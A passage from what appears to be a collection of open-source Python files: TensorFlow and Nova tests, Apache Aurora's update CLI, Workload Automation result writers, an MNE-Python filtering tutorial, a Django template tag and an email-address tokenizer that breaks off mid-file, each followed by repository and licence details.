instance_id='00000000-0000-0000-0000-0000000000000002',
name='test2',
hours=42,
memory_mb=4201,
local_gb=25,
vcpus=1,
tenant_id='tenant4',
flavor='m1.tiny',
started_at=today,
ended_at=yesterday,
state='terminated',
uptime=43200),
],
),
]
tenant_usages = dict(tenant_usages=raw_usages)
text = serializer.serialize(tenant_usages)
print text
tree = etree.fromstring(text)
self.assertEqual('tenant_usages', tree.tag)
self.assertEqual(len(raw_usages), len(tree))
for idx, child in enumerate(tree):
self._verify_tenant_usage(raw_usages[idx], child)
| tylertian/Openstack | openstack F/nova/nova/tests/api/openstack/compute/contrib/test_simple_tenant_usage.py | Python | apache-2.0 | 14,592 |
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for anf module."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.contrib.autograph.pyct import compiler
from tensorflow.contrib.autograph.pyct import parser
from tensorflow.contrib.autograph.pyct import transformer
from tensorflow.contrib.autograph.pyct.common_transformers import anf
from tensorflow.python.platform import test
class AnfTransformerTest(test.TestCase):
def _simple_source_info(self):
return transformer.EntityInfo(
source_code=None,
source_file=None,
namespace=None,
arg_values=None,
arg_types=None,
owner_type=None)
def test_basic(self):
def test_function():
a = 0
return a
node, _ = parser.parse_entity(test_function)
node = anf.transform(node, self._simple_source_info())
result, _ = compiler.ast_to_object(node)
self.assertEqual(test_function(), result.test_function())
if __name__ == '__main__':
test.main()
| jart/tensorflow | tensorflow/contrib/autograph/pyct/common_transformers/anf_test.py | Python | apache-2.0 | 1,708 |
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import print_function
import datetime
import json
import textwrap
import time
from collections import namedtuple
from apache.aurora.client.api import AuroraClientAPI
from apache.aurora.client.base import combine_messages, get_update_page
from apache.aurora.client.cli import (
EXIT_API_ERROR,
EXIT_COMMAND_FAILURE,
EXIT_INVALID_CONFIGURATION,
EXIT_INVALID_PARAMETER,
EXIT_OK,
EXIT_UNKNOWN_ERROR,
Noun,
Verb
)
from apache.aurora.client.cli.context import AuroraCommandContext
from apache.aurora.client.cli.options import (
ALL_INSTANCES,
BIND_OPTION,
BROWSER_OPTION,
CONFIG_ARGUMENT,
HEALTHCHECK_OPTION,
INSTANCES_SPEC_ARGUMENT,
JOBSPEC_ARGUMENT,
JSON_READ_OPTION,
JSON_WRITE_OPTION,
STRICT_OPTION,
CommandOption
)
from apache.aurora.common.aurora_job_key import AuroraJobKey
from gen.apache.aurora.api.constants import ACTIVE_JOB_UPDATE_STATES
from gen.apache.aurora.api.ttypes import JobUpdateAction, JobUpdateKey, JobUpdateStatus
class UpdateController(object):
def __init__(self, api, context):
self.api = api
self.context = context
def get_update_key(self, job_key):
response = self.api.query_job_updates(update_statuses=ACTIVE_JOB_UPDATE_STATES, job_key=job_key)
self.context.log_response_and_raise(response)
summaries = response.result.getJobUpdateSummariesResult.updateSummaries
if response.result.getJobUpdateSummariesResult.updateSummaries:
if len(summaries) == 1:
return summaries[0].key
else:
raise self.context.CommandError(
EXIT_API_ERROR,
"The scheduler returned multiple active updates for this job.")
else:
return None
def _modify_update(self, job_key, mutate_fn, error_msg, success_msg):
update_key = self.get_update_key(job_key)
if update_key is None:
self.context.print_err("No active update found for this job.")
return EXIT_INVALID_PARAMETER
resp = mutate_fn(update_key)
self.context.log_response_and_raise(resp, err_code=EXIT_API_ERROR, err_msg=error_msg)
self.context.print_out(success_msg)
return EXIT_OK
def pause(self, job_key, message):
return self._modify_update(
job_key,
lambda key: self.api.pause_job_update(key, message),
"Failed to pause update due to error:",
"Update has been paused.")
def resume(self, job_key, message):
return self._modify_update(
job_key,
lambda key: self.api.resume_job_update(key, message),
"Failed to resume update due to error:",
"Update has been resumed.")
def abort(self, job_key, message):
return self._modify_update(
job_key,
lambda key: self.api.abort_job_update(key, message),
"Failed to abort update due to error:",
"Update has been aborted.")
def format_timestamp(stamp_millis):
return datetime.datetime.utcfromtimestamp(stamp_millis / 1000).isoformat()
MESSAGE_OPTION = CommandOption(
'--message',
'-m',
type=str,
default=None,
help='Message to include with the update state transition')
class StartUpdate(Verb):
UPDATE_MSG_TEMPLATE = "Job update has started. View your update progress at %s"
WAIT_OPTION = CommandOption(
'--wait',
default=False,
action='store_true',
help='Wait until the update completes')
def __init__(self, clock=time):
self._clock = clock
@property
def name(self):
return 'start'
def get_options(self):
return [
BIND_OPTION,
BROWSER_OPTION,
HEALTHCHECK_OPTION,
JSON_READ_OPTION,
MESSAGE_OPTION,
STRICT_OPTION,
INSTANCES_SPEC_ARGUMENT,
CONFIG_ARGUMENT,
self.WAIT_OPTION
]
@property
def help(self):
return textwrap.dedent("""\
Start a rolling update of a running job, using the update configuration within the config
file as a control for update velocity and failure tolerance.
The updater only takes action on instances in a job that have changed, meaning
that changing a single instance will only induce a restart on the changed task instance.
You may want to consider using the 'aurora job diff' subcommand before updating,
to preview what changes will take effect.
""")
def execute(self, context):
job = context.options.instance_spec.jobkey
instances = (None if context.options.instance_spec.instance == ALL_INSTANCES else
context.options.instance_spec.instance)
config = context.get_job_config(job, context.options.config_file)
if config.raw().has_cron_schedule():
raise context.CommandError(
EXIT_COMMAND_FAILURE,
"Cron jobs may only be updated with \"aurora cron schedule\" command")
api = context.get_api(config.cluster())
try:
resp = api.start_job_update(config, context.options.message, instances)
except AuroraClientAPI.UpdateConfigError as e:
raise context.CommandError(EXIT_INVALID_CONFIGURATION, e.message)
context.log_response_and_raise(resp, err_code=EXIT_API_ERROR,
err_msg="Failed to start update due to error:")
if resp.result:
update_key = resp.result.startJobUpdateResult.key
url = get_update_page(
api,
AuroraJobKey.from_thrift(config.cluster(), update_key.job),
resp.result.startJobUpdateResult.key.id)
context.print_out(self.UPDATE_MSG_TEMPLATE % url)
if context.options.wait:
return wait_for_update(context, self._clock, api, update_key)
else:
context.print_out(combine_messages(resp))
return EXIT_OK
def wait_for_update(context, clock, api, update_key):
cur_state = None
while True:
resp = api.query_job_updates(update_key=update_key)
context.log_response_and_raise(resp)
summaries = resp.result.getJobUpdateSummariesResult.updateSummaries
if len(summaries) == 1:
new_state = summaries[0].state.status
if new_state != cur_state:
cur_state = new_state
context.print_out('Current state %s' % JobUpdateStatus._VALUES_TO_NAMES[cur_state])
if cur_state not in ACTIVE_JOB_UPDATE_STATES:
if cur_state == JobUpdateStatus.ROLLED_FORWARD:
return EXIT_OK
elif cur_state == JobUpdateStatus.ROLLED_BACK:
return EXIT_COMMAND_FAILURE
else:
return EXIT_UNKNOWN_ERROR
clock.sleep(5)
elif len(summaries) == 0:
raise context.CommandError(EXIT_INVALID_PARAMETER, 'Job update not found.')
else:
raise context.CommandError(
EXIT_API_ERROR,
'Scheduler returned multiple updates: %s' % summaries)
UPDATE_ID_ARGUMENT = CommandOption(
'id',
type=str,
nargs='?',
metavar='ID',
help='Update identifier provided by the scheduler when an update was started.')
class UpdateWait(Verb):
def __init__(self, clock=time):
self._clock = clock
@property
def name(self):
return 'wait'
def get_options(self):
return [JOBSPEC_ARGUMENT, UPDATE_ID_ARGUMENT]
@property
def help(self):
return 'Block until an update has entered a terminal state.'
def execute(self, context):
return wait_for_update(
context,
self._clock,
context.get_api(context.options.jobspec.cluster),
JobUpdateKey(job=context.options.jobspec.to_thrift(), id=context.options.id))
class PauseUpdate(Verb):
@property
def name(self):
return 'pause'
def get_options(self):
return [JOBSPEC_ARGUMENT, MESSAGE_OPTION]
@property
def help(self):
return 'Pause an update.'
def execute(self, context):
job_key = context.options.jobspec
return UpdateController(context.get_api(job_key.cluster), context).pause(
job_key,
context.options.message)
class ResumeUpdate(Verb):
@property
def name(self):
return 'resume'
def get_options(self):
return [JOBSPEC_ARGUMENT, MESSAGE_OPTION]
@property
def help(self):
return 'Resume an update.'
def execute(self, context):
job_key = context.options.jobspec
return UpdateController(context.get_api(job_key.cluster), context).resume(
job_key,
context.options.message)
class AbortUpdate(Verb):
@property
def name(self):
return 'abort'
def get_options(self):
return [JOBSPEC_ARGUMENT, MESSAGE_OPTION]
@property
def help(self):
return 'Abort an in-progress update.'
def execute(self, context):
job_key = context.options.jobspec
return UpdateController(context.get_api(job_key.cluster), context).abort(
job_key,
context.options.message)
UpdateFilter = namedtuple('UpdateFilter', ['cluster', 'role', 'env', 'job'])
class ListUpdates(Verb):
@staticmethod
def update_filter(filter_str):
if filter_str is None or filter_str == '':
raise ValueError('Update filter must be non-empty')
parts = filter_str.split('/')
if len(parts) == 0 or len(parts) > 4:
raise ValueError('Update filter must be a path of the form CLUSTER/ROLE/ENV/JOB.')
# Pad with None.
parts = parts + ([None] * (4 - len(parts)))
return UpdateFilter(
cluster=parts[0],
role=parts[1],
env=parts[2],
job=parts[3])
@property
def name(self):
return 'list'
STATUS_GROUPS = dict({
'active': ACTIVE_JOB_UPDATE_STATES,
'all': set(JobUpdateStatus._VALUES_TO_NAMES.keys()),
'blocked': {
JobUpdateStatus.ROLL_FORWARD_AWAITING_PULSE, JobUpdateStatus.ROLL_BACK_AWAITING_PULSE},
'failed': {JobUpdateStatus.ERROR, JobUpdateStatus.FAILED, JobUpdateStatus.ROLLED_BACK},
'inactive': set(JobUpdateStatus._VALUES_TO_NAMES.keys()) - ACTIVE_JOB_UPDATE_STATES,
'paused': {JobUpdateStatus.ROLL_FORWARD_PAUSED, JobUpdateStatus.ROLL_BACK_PAUSED},
'succeeded': {JobUpdateStatus.ROLLED_FORWARD},
}.items() + [(k, {v}) for k, v in JobUpdateStatus._NAMES_TO_VALUES.items()])
def get_options(self):
return [
CommandOption(
'filter',
type=self.update_filter,
metavar="CLUSTER[/ROLE[/ENV[/JOB]]]",
help=('A path-like specifier for the scope of updates to list.')),
CommandOption(
"--status",
choices=self.STATUS_GROUPS,
default=[],
action="append",
help="""Update state to filter by. This may be specified multiple times, in which case
updates matching any of the specified statuses will be included."""),
CommandOption("--user", default=None, metavar="username",
help="The name of the user who initiated the update"),
JSON_WRITE_OPTION
]
@property
def help(self):
return "List summaries of job updates."
COLUMNS = [
('JOB', 47),
('UPDATE ID', 36),
('STATUS', 15),
('CREATED BY', 11),
('STARTED', 19),
('LAST MODIFIED', 19)
]
FORMAT_STR = ' '.join(["{%d:%d}" % (i, col[1]) for i, col in enumerate(COLUMNS)])
HEADER = FORMAT_STR.format(*[c[0] for c in COLUMNS])
def execute(self, context):
update_filter = context.options.filter
cluster = update_filter.cluster
if (update_filter.role is not None
and update_filter.env is not None
and update_filter.job is not None):
job_key = AuroraJobKey(
cluster=cluster,
role=update_filter.role,
env=update_filter.env,
name=update_filter.job)
else:
job_key = None
api = context.get_api(cluster)
filter_statuses = set()
for status in context.options.status:
filter_statuses = filter_statuses.union(set(self.STATUS_GROUPS[status]))
response = api.query_job_updates(
role=update_filter.role if job_key is None else None,
job_key=job_key,
update_statuses=filter_statuses if filter_statuses else None,
user=context.options.user)
context.log_response_and_raise(response)
# The API does not offer a way to query by environment, so if that filter is requested, we
# perform a more broad role-based query and filter here.
summaries = response.result.getJobUpdateSummariesResult.updateSummaries
if job_key is None and update_filter.env is not None:
summaries = [s for s in summaries if s.key.job.environment == update_filter.env]
if context.options.write_json:
result = []
for summary in summaries:
job_entry = {
"job": AuroraJobKey.from_thrift(cluster, summary.key.job).to_path(),
"id": summary.key.id,
"user": summary.user,
"started": format_timestamp(summary.state.createdTimestampMs),
"last_modified": format_timestamp(summary.state.lastModifiedTimestampMs),
"status": JobUpdateStatus._VALUES_TO_NAMES[summary.state.status]
}
result.append(job_entry)
context.print_out(json.dumps(result, indent=2, separators=[',', ': '], sort_keys=False))
else:
if summaries:
context.print_out(self.HEADER)
for summary in summaries:
context.print_out(self.FORMAT_STR.format(
AuroraJobKey.from_thrift(cluster, summary.key.job).to_path(),
summary.key.id,
JobUpdateStatus._VALUES_TO_NAMES[summary.state.status],
summary.user,
format_timestamp(summary.state.createdTimestampMs),
format_timestamp(summary.state.lastModifiedTimestampMs))
)
return EXIT_OK
class UpdateInfo(Verb):
@property
def name(self):
return 'info'
def get_options(self):
return [JSON_WRITE_OPTION, JOBSPEC_ARGUMENT, UPDATE_ID_ARGUMENT]
@property
def help(self):
return """Display detailed status information about a scheduler-driven in-progress update.
If no update ID is provided, information will be displayed about the active
update for the job."""
def execute(self, context):
if context.options.id:
key = JobUpdateKey(job=context.options.jobspec.to_thrift(), id=context.options.id)
else:
key = UpdateController(
context.get_api(context.options.jobspec.cluster),
context).get_update_key(context.options.jobspec)
if key is None:
context.print_err("There is no active update for this job.")
return EXIT_INVALID_PARAMETER
api = context.get_api(context.options.jobspec.cluster)
response = api.get_job_update_details(key)
context.log_response_and_raise(response)
details = response.result.getJobUpdateDetailsResult.details
if context.options.write_json:
result = {
"updateId": ("%s" % details.update.summary.key.id),
"job": str(context.options.jobspec),
"started": details.update.summary.state.createdTimestampMs,
"last_modified": format_timestamp(details.update.summary.state.lastModifiedTimestampMs),
"status": JobUpdateStatus._VALUES_TO_NAMES[details.update.summary.state.status],
"update_events": [],
"instance_update_events": []
}
update_events = details.updateEvents
if update_events is not None and len(update_events) > 0:
for event in update_events:
event_data = {
"status": JobUpdateStatus._VALUES_TO_NAMES[event.status],
"timestampMs": event.timestampMs
}
if event.message:
event_data["message"] = event.message
result["update_events"].append(event_data)
instance_events = details.instanceEvents
if instance_events is not None and len(instance_events) > 0:
for event in instance_events:
result["instance_update_events"].append({
"instance": event.instanceId,
"timestamp": event.timestampMs,
"action": JobUpdateAction._VALUES_TO_NAMES[event.action]
})
context.print_out(json.dumps(result, indent=2, separators=[',', ': '], sort_keys=False))
else:
context.print_out("Job: %s, UpdateID: %s" % (context.options.jobspec,
details.update.summary.key.id))
context.print_out("Started %s, last activity: %s" %
(format_timestamp(details.update.summary.state.createdTimestampMs),
format_timestamp(details.update.summary.state.lastModifiedTimestampMs)))
context.print_out("Current status: %s" %
JobUpdateStatus._VALUES_TO_NAMES[details.update.summary.state.status])
update_events = details.updateEvents
if update_events is not None and len(update_events) > 0:
context.print_out("Update events:")
for event in update_events:
context.print_out("Status: %s at %s" % (
JobUpdateStatus._VALUES_TO_NAMES[event.status],
format_timestamp(event.timestampMs)
), indent=2)
if event.message:
context.print_out(" message: %s" % event.message, indent=4)
instance_events = details.instanceEvents
if instance_events is not None and len(instance_events) > 0:
context.print_out("Instance events:")
for event in instance_events:
context.print_out("Instance %s at %s: %s" % (
event.instanceId, format_timestamp(event.timestampMs),
JobUpdateAction._VALUES_TO_NAMES[event.action]
), indent=2)
return EXIT_OK
class Update(Noun):
@property
def name(self):
return "update"
@property
def help(self):
return "Interact with the aurora update service."
@classmethod
def create_context(cls):
return AuroraCommandContext()
def __init__(self):
super(Update, self).__init__()
self.register_verb(StartUpdate())
self.register_verb(PauseUpdate())
self.register_verb(ResumeUpdate())
self.register_verb(AbortUpdate())
self.register_verb(ListUpdates())
self.register_verb(UpdateInfo())
self.register_verb(UpdateWait())
| shahankhatch/aurora | src/main/python/apache/aurora/client/cli/update.py | Python | apache-2.0 | 18,361 |
# Copyright 2013-2015 ARM Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# pylint: disable=R0201
"""
This module contains a few "standard" result processors that write results to
text files in various formats.
"""
import os
import csv
import json
from wlauto import ResultProcessor, Parameter
from wlauto.exceptions import ConfigError
from wlauto.utils.types import list_of_strings
class StandardProcessor(ResultProcessor):
name = 'standard'
description = """
Creates a ``result.txt`` file for every iteration that contains metrics
for that iteration.
The metrics are written in ::
metric = value [units]
format.
"""
def process_iteration_result(self, result, context):
outfile = os.path.join(context.output_directory, 'result.txt')
with open(outfile, 'w') as wfh:
for metric in result.metrics:
line = '{} = {}'.format(metric.name, metric.value)
if metric.units:
line = ' '.join([line, metric.units])
line += '\n'
wfh.write(line)
context.add_artifact('iteration_result', 'result.txt', 'export')
class CsvReportProcessor(ResultProcessor):
"""
Creates a ``results.csv`` in the output directory containing results for
all iterations in CSV format, each line containing a single metric.
"""
name = 'csv'
parameters = [
Parameter('use_all_classifiers', kind=bool, default=False,
global_alias='use_all_classifiers',
description="""
If set to ``True``, this will add a column for every classifier
that features in at least one collected metric.
.. note:: This cannot be ``True`` if ``extra_columns`` is set.
"""),
Parameter('extra_columns', kind=list_of_strings,
description="""
List of classifiers to use as columns.
.. note:: This cannot be set if ``use_all_classifiers`` is ``True``.
"""),
]
def validate(self):
if self.use_all_classifiers and self.extra_columns:
raise ConfigError('extra_columns cannot be specified when use_all_classifiers is True')
def initialize(self, context):
self.results_so_far = [] # pylint: disable=attribute-defined-outside-init
def process_iteration_result(self, result, context):
self.results_so_far.append(result)
self._write_results(self.results_so_far, context)
def process_run_result(self, result, context):
self._write_results(result.iteration_results, context)
context.add_artifact('run_result_csv', 'results.csv', 'export')
def _write_results(self, results, context):
if self.use_all_classifiers:
classifiers = set([])
for ir in results:
for metric in ir.metrics:
classifiers.update(metric.classifiers.keys())
extra_columns = list(classifiers)
elif self.extra_columns:
extra_columns = self.extra_columns
else:
extra_columns = []
outfile = os.path.join(context.run_output_directory, 'results.csv')
with open(outfile, 'wb') as wfh:
writer = csv.writer(wfh)
writer.writerow(['id', 'workload', 'iteration', 'metric', ] +
extra_columns + ['value', 'units'])
for ir in results:
for metric in ir.metrics:
row = ([ir.id, ir.spec.label, ir.iteration, metric.name] +
[str(metric.classifiers.get(c, '')) for c in extra_columns] +
[str(metric.value), metric.units or ''])
writer.writerow(row)
class JsonReportProcessor(ResultProcessor):
"""
Creates a ``results.json`` in the output directory containing results for
all iterations in JSON format.
"""
name = 'json'
def process_run_result(self, result, context):
outfile = os.path.join(context.run_output_directory, 'results.json')
with open(outfile, 'wb') as wfh:
output = []
for result in result.iteration_results:
output.append({
'id': result.id,
'workload': result.workload.name,
'iteration': result.iteration,
'metrics': [dict([(k, v) for k, v in m.__dict__.iteritems()
if not k.startswith('_')])
for m in result.metrics],
})
json.dump(output, wfh, indent=4)
context.add_artifact('run_result_json', 'results.json', 'export')
class SummaryCsvProcessor(ResultProcessor):
"""
Similar to csv result processor, but only contains workloads' summary metrics.
"""
name = 'summary_csv'
def process_run_result(self, result, context):
outfile = os.path.join(context.run_output_directory, 'summary.csv')
with open(outfile, 'wb') as wfh:
writer = csv.writer(wfh)
writer.writerow(['id', 'workload', 'iteration', 'metric', 'value', 'units'])
for result in result.iteration_results:
for metric in result.metrics:
if metric.name in result.workload.summary_metrics:
row = [result.id, result.workload.name, result.iteration,
metric.name, str(metric.value), metric.units or '']
writer.writerow(row)
context.add_artifact('run_result_summary', 'summary.csv', 'export')
| bjackman/workload-automation | wlauto/result_processors/standard.py | Python | apache-2.0 | 6,207 |
"""
Filtering and resampling data
=============================
Some artifacts are restricted to certain frequencies and can therefore
be fixed by filtering. An artifact that typically affects only some
frequencies is due to the power line.
Power-line noise is a noise created by the electrical network.
It is composed of sharp peaks at 50Hz (or 60Hz depending on your
geographical location). Some peaks may also be present at the harmonic
frequencies, i.e. the integer multiples of
the power-line frequency, e.g. 100Hz, 150Hz, ... (or 120Hz, 180Hz, ...).
This tutorial covers some basics of how to filter data in MNE-Python.
For more in-depth information about filter design in general and in
MNE-Python in particular, check out
:ref:`sphx_glr_auto_tutorials_plot_background_filtering.py`.
"""
import numpy as np
import mne
from mne.datasets import sample
data_path = sample.data_path()
raw_fname = data_path + '/MEG/sample/sample_audvis_raw.fif'
proj_fname = data_path + '/MEG/sample/sample_audvis_eog_proj.fif'
tmin, tmax = 0, 20 # use the first 20s of data
# Setup for reading the raw data (save memory by cropping the raw data
# before loading it)
raw = mne.io.read_raw_fif(raw_fname)
raw.crop(tmin, tmax).load_data()
raw.info['bads'] = ['MEG 2443', 'EEG 053'] # bads + 2 more
fmin, fmax = 2, 300 # look at frequencies between 2 and 300Hz
n_fft = 2048 # the FFT size (n_fft). Ideally a power of 2
# Pick a subset of channels (here for speed reason)
selection = mne.read_selection('Left-temporal')
picks = mne.pick_types(raw.info, meg='mag', eeg=False, eog=False,
stim=False, exclude='bads', selection=selection)
# Let's first check out all channel types
raw.plot_psd(area_mode='range', tmax=10.0, picks=picks, average=False)
###############################################################################
# Removing power-line noise with notch filtering
# ----------------------------------------------
#
# Removing power-line noise can be done with a Notch filter, directly on the
# Raw object, specifying an array of frequency to be cut off:
raw.notch_filter(np.arange(60, 241, 60), picks=picks, filter_length='auto',
phase='zero')
raw.plot_psd(area_mode='range', tmax=10.0, picks=picks, average=False)
###############################################################################
# Removing power-line noise with low-pass filtering
# -------------------------------------------------
#
# If you're only interested in low frequencies, below the peaks of power-line
# noise you can simply low pass filter the data.
# low pass filtering below 50 Hz
raw.filter(None, 50., fir_design='firwin')
raw.plot_psd(area_mode='range', tmax=10.0, picks=picks, average=False)
###############################################################################
# High-pass filtering to remove slow drifts
# -----------------------------------------
#
# To remove slow drifts, you can high pass.
#
# .. warning:: In several applications such as event-related potential (ERP)
# and event-related field (ERF) analysis, high-pass filters with
# cutoff frequencies greater than 0.1 Hz are usually considered
# problematic since they significantly change the shape of the
# resulting averaged waveform (see examples in
# :ref:`tut_filtering_hp_problems`). In such applications, apply
# high-pass filters with caution.
raw.filter(1., None, fir_design='firwin')
raw.plot_psd(area_mode='range', tmax=10.0, picks=picks, average=False)
###############################################################################
# To do the low-pass and high-pass filtering in one step you can do
# a so-called *band-pass* filter by running the following:
# band-pass filtering in the range 1 Hz - 50 Hz
raw.filter(1, 50., fir_design='firwin')
###############################################################################
# Downsampling and decimation
# ---------------------------
#
# When performing experiments where timing is critical, a signal with a high
# sampling rate is desired. However, having a signal with a much higher
# sampling rate than necessary needlessly consumes memory and slows down
# computations operating on the data. To avoid that, you can downsample
# your time series. Since downsampling raw data reduces the timing precision
# of events, it is recommended only for use in procedures that do not require
# optimal precision, e.g. computing EOG or ECG projectors on long recordings.
#
# .. note:: A *downsampling* operation performs a low-pass (to prevent
# aliasing) followed by *decimation*, which selects every
# :math:`N^{th}` sample from the signal. See
# :func:`scipy.signal.resample` and
# :func:`scipy.signal.resample_poly` for examples.
#
# Data resampling can be done with *resample* methods.
raw.resample(100, npad="auto") # set sampling frequency to 100Hz
raw.plot_psd(area_mode='range', tmax=10.0, picks=picks)
###############################################################################
# To avoid this reduction in precision, the suggested pipeline for
# processing final data to be analyzed is:
#
# 1. low-pass the data with :meth:`mne.io.Raw.filter`.
# 2. Extract epochs with :class:`mne.Epochs`.
# 3. Decimate the Epochs object using :meth:`mne.Epochs.decimate` or the
# ``decim`` argument to the :class:`mne.Epochs` object.
#
# We also provide the convenience methods :meth:`mne.Epochs.resample` and
# :meth:`mne.Evoked.resample` to downsample or upsample data, but these are
# less optimal because they will introduce edge artifacts into every epoch,
# whereas filtering the raw data will only introduce edge artifacts only at
# the start and end of the recording.
| teonlamont/mne-python | tutorials/plot_artifacts_correction_filtering.py | Python | bsd-3-clause | 5,783 |
from django import template
register = template.Library()
@register.simple_tag(takes_context=True)
def table_specific(context, table_id):
"""Safely include a fragment specific to the given table, but handle no special info gracefully."""
try:
fragment_path = "table/specific/%s.html" % table_id
t = template.loader.get_template(fragment_path)
return t.render(context)
except template.TemplateDoesNotExist:
return ""
| uscensusbureau/censusreporter | censusreporter/apps/census/templatetags/tabletags.py | Python | mit | 462 |
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Regression using the DNNRegressor Estimator."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
import imports85 # pylint: disable=g-bad-import-order
STEPS = 5000
def main(argv):
"""Builds, trains, and evaluates the model."""
assert len(argv) == 1
(x_train, y_train), (x_test, y_test) = imports85.load_data()
# Build the training input_fn.
input_train = tf.estimator.inputs.pandas_input_fn(
x=x_train, y=y_train, num_epochs=None, shuffle=True)
# Build the validation input_fn.
input_test = tf.estimator.inputs.pandas_input_fn(
x=x_test, y=y_test, shuffle=True)
# The first way assigns a unique weight to each category. To do this you must
# specify the category's vocabulary (values outside this specification will
# receive a weight of zero). Here we specify the vocabulary using a list of
# options. The vocabulary can also be specified with a vocabulary file (using
# `categorical_column_with_vocabulary_file`). For features covering a
# range of positive integers use `categorical_column_with_identity`.
body_style_vocab = ["hardtop", "wagon", "sedan", "hatchback", "convertible"]
body_style = tf.feature_column.categorical_column_with_vocabulary_list(
key="body-style", vocabulary_list=body_style_vocab)
make = tf.feature_column.categorical_column_with_hash_bucket(
key="make", hash_bucket_size=50)
feature_columns = [
tf.feature_column.numeric_column(key="curb-weight"),
tf.feature_column.numeric_column(key="highway-mpg"),
# Since this is a DNN model, convert categorical columns from sparse
# to dense.
# Wrap them in an `indicator_column` to create a
# one-hot vector from the input.
tf.feature_column.indicator_column(body_style),
# Or use an `embedding_column` to create a trainable vector for each
# index.
tf.feature_column.embedding_column(make, dimension=3),
]
# Build a DNNRegressor, with 2x20-unit hidden layers, with the feature columns
# defined above as input.
model = tf.estimator.DNNRegressor(
hidden_units=[20, 20], feature_columns=feature_columns)
# Train the model.
model.train(input_fn=input_train, steps=STEPS)
# Evaluate how the model performs on data it has not yet seen.
eval_result = model.evaluate(input_fn=input_test)
# The evaluation returns a Python dictionary. The "average_loss" key holds the
# Mean Squared Error (MSE).
average_loss = eval_result["average_loss"]
# Convert MSE to Root Mean Square Error (RMSE).
print("\n" + 80 * "*")
print("\nRMS error for the test set: ${:.0f}".format(average_loss**0.5))
print()
if __name__ == "__main__":
# The Estimator periodically generates "INFO" logs; make these logs visible.
tf.logging.set_verbosity(tf.logging.INFO)
tf.app.run(main=main)
| xuleiboy1234/autoTitle | tensorflow/tensorflow/examples/get_started/regression/dnn_regression.py | Python | mit | 3,579 |
# coding:utf-8
"""
TokenStream represents a stream of tokens that a parser will consume.
TokenStream can be used to consume tokens, peek ahead, and synchonize to a
delimiter token. The tokens that the token stream operates on are either
compiled regular expressions or strings.
"""
import re
LBRACKET = '<'
AT_SYMBOL = '@'
RBRACKET = '>'
DQUOTE = '"'
BAD_DOMAIN = re.compile(r''' # start or end
^-|-$ # with -
''', re.MULTILINE | re.VERBOSE)
DELIMITER = re.compile(r'''
[,;][,;\s]* # delimiter
''', re.MULTILINE | re.VERBOSE)
WHITESPACE = re.compile(r'''
(\ |\t)+ # whitespace
''', re.MULTILINE | re.VERBOSE)
UNI_WHITE = re.compile(ur'''
[
\u0020\u00a0\u1680\u180e
\u2000-\u200a
\u2028\u202f\u205f\u3000
]*
''', re.MULTILINE | re.VERBOSE | re.UNICODE)
RELAX_ATOM = re.compile(r'''
([^\s<>;,"]+)
''', re.MULTILINE | re.VERBOSE)
ATOM = re.compile(r'''
[A-Za-z0-9!#$%&'*+\-/=?^_`{|}~]+ # atext
''', re.MULTILINE | re.VERBOSE)
DOT_ATOM = re.compile(r'''
[A-Za-z0-9!#$%&'*+\-/=?^_`{|}~]+ # atext
(\.[A-Za-z0-9!#$%&'*+\-/=?^_`{|}~]+)* # (dot atext)*
''', re.MULTILINE | re.VERBOSE)
UNI_ATOM = re.compile(ur'''
([^\s<>;,"]+)
''', re.MULTILINE | re.VERBOSE | re.UNICODE)
UNI_QSTR = re.compile(ur'''
"
(?P<qstr>([^"]+))
"
''', re.MULTILINE | re.VERBOSE | re.UNICODE)
QSTRING = re.compile(r'''
" # dquote
(\s* # whitespace
([\x21\x23-\x5b\x5d-\x7e] # qtext
| # or
\\[\x21-\x7e\t\ ]))* # quoted-pair
\s* # whitespace
" # dquote
''', re.MULTILINE | re.VERBOSE)
URL = re.compile(r'''
(?:http|https)://
[^\s<>{}|\^~\[\]`;,]+
''', re.MULTILINE | re.VERBOSE | re.UNICODE)
class TokenStream(object):
"""
Represents the stream of tokens that the parser will consume. The token
stream can be used to consume tokens, peek ahead, and synchonize to a
delimiter token.
When the strem reaches its end, the position is placed
at one plus the position of the last token.
"""
def __init__(self, stream):
self.position = 0
self.stream = stream
def get_token(self, token, ngroup=None):
"""
Get the next token from the stream and advance the stream. Token can
be either a compiled regex or a string.
"""
# match single character
if isinstance(token, basestring) and len(token) == 1:
if self.peek() == token:
self.position += 1
return token
return None
# match a pattern
match = token.match(self.stream, self.position)
if match:
advance = match.end() - match.start()
self.position += advance
# if we are asking for a named capture, return jus that
if ngroup:
return match.group(ngroup)
# otherwise return the entire capture
return match.group()
return None
def end_of_stream(self):
"""
Check if the end of the stream has been reached, if it has, returns
True, otherwise false.
"""
if self.position >= len(self.stream):
return True
return False
def synchronize(self):
